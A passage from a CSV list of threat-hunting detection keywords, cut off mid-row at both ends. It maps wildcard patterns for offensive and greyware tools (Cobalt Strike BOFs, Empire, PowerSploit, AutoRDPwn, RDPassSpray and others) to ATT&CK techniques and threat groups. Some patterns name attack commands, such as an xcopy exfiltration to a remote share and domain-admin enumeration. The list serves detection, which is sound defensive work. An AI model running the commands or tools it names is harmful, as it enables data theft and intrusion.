FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*Write-PortscanOut*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Write-ServiceBinary*,offensive_tool_keyword,AD exploitation cheat sheet,Exploit an unquoted service path vulnerability to spawn a beacon,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Write-UserAddMSI*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ws://localhost:58082*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*wscript_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*WScriptBypassUAC*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*wsl kali-linux*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,wsl execution,N/A,N/A,N/A,N/A,N/A,N/A -*WSPCoerce.ex*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*WSPCoerce-main*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*WSUSpendu*,offensive_tool_keyword,WSUSpendu,At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.,T1563 - T1204 - T1210 - T1071,TA0001 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/AlsidOfficial/WSUSpendu,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wsuxploit*,offensive_tool_keyword,wsuxploit,This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update,T1557.001 - T1557.002 - T1573 - T1210.001,TA0001 - TA0002 - TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/pimps/wsuxploit,1,1,N/A,N/A,3,267,50,2022-11-25T10:04:15Z,2017-06-30T01:06:41Z -*wts_enum_remote_processes*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*wumb0/rust_bof*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*www.exploit-db.com/download/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.ip-api.com*,greyware_tool_keyword,ip-api.com,get public ip address,T1016 - T1071.001,TA0005 - TA0002,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*www.kali.org/get-kali/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*www.securityfocus.com/archive/1/514379*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.vsecurity.com/download/tools/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.wfuzz.org*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wxfuzz.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wxfuzz.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*WytdIEluamVjdGVkIHRoZSA=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*-x *net group *Domain Admins* /domain*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*X32_ClSp_Tcp_Exe.exe*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*X64_ClSp_Tcp_Exe.exe*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*x64PELoader/*.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*x86_64-unknown-uefi*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*x86PELoader/*.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_agent_dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_agent_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_proxy_dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_proxy_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x90skysn3k*,offensive_tool_keyword,Github Username,Github username known for password exploitation and offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/x90skysn3k,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xato-net-10-million-usernames.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*X-C2-Beacon*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*xcopy /y /d *\msquic_schannel\msquic.dll*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,0,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*xcopy c:\* \\*\c$*,greyware_tool_keyword,xcopy,command abused by attackers - exfiltraiton to remote host with xcopy,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Data Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*xforcered/CredBandit*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*xforcered/Detect-Hooks*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/Detect-Hooks,1,1,N/A,10,10,91,6,2021-07-22T20:13:16Z,2021-07-23T16:10:37Z -*xforwardedfor.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*xFreed0m/RDPassSpray*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*xfreerdp /v*SOCtest*AllLegitHere*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,0,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*xfrm_poc*lucky0*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*xillwillx*,offensive_tool_keyword,Github Username,github repo username hosting red team tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/xillwillx,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*XiphosResearch*,offensive_tool_keyword,exploits,Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.,T1203 - T1068 - T1062 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/XiphosResearch/exploits,1,0,N/A,N/A,10,1433,606,2023-07-20T10:15:01Z,2015-03-05T11:15:07Z -*x-ishavocframework*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - 